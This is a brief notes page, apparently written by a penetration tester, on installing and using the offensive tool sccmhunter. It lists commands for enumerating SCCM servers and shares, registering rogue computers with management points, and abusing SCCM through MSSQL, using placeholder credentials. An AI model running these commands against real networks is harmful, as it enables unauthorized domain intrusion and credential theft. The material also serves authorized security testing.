# sccmhunter.py
A rad [tool](https://github.com/garrettfoster13/sccmhunter) for hunting SCCM!

# Install
```
git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
virtualenv --python=python3 .
source bin/activate
pip3 install -r requirements.txt
python3 sccmhunter.py -h
```

## Enumerate SCCM config, enumerate remote hosts SMB shares, signing status, and SQL service status
```
sccmhunter.py find -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5
```

## Enumerate SMB shares
The instructions say this "profiles and enumerates SMB shares of discovered SCCM servers, where as the find command "Enumerates LDAP and SCCM assets."  I believe it does an SMB-level dive into shares looking for PXEBoot variables files.
 
```
sccmhunter.py smb -u lowpriv -p pass -d domain.com -dc-ip 1.2.3.4
```

## Enumerate user accounts associated with SCCM
```
python3 sccmhunter.py show -users
```

## View all the enumeration info you have after doing the "find" command
```
sccmhunter.py show -all
```

## Create/register a computer with HTTP management point
```
sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto
```

### Do the same thing but with an existing computer account
```
sccmhunter.py http -u lowpriv -p 'JingleAllTheWay!' -cn 'GHOSTY$' -cp 'ComputerPasswordForGhosty' -d schwarzenegger.com -dc-ip 10.0.5.5 -ldaps -auto
``` 

## Abuse via SQL
```
sccmhunter.py mssql -u lowpriv -p 'JingleAllTheWay!' -d schwarzenegger.com -dc-ip 10.0.5.5 -tu lowpriv -sc SITECODE
```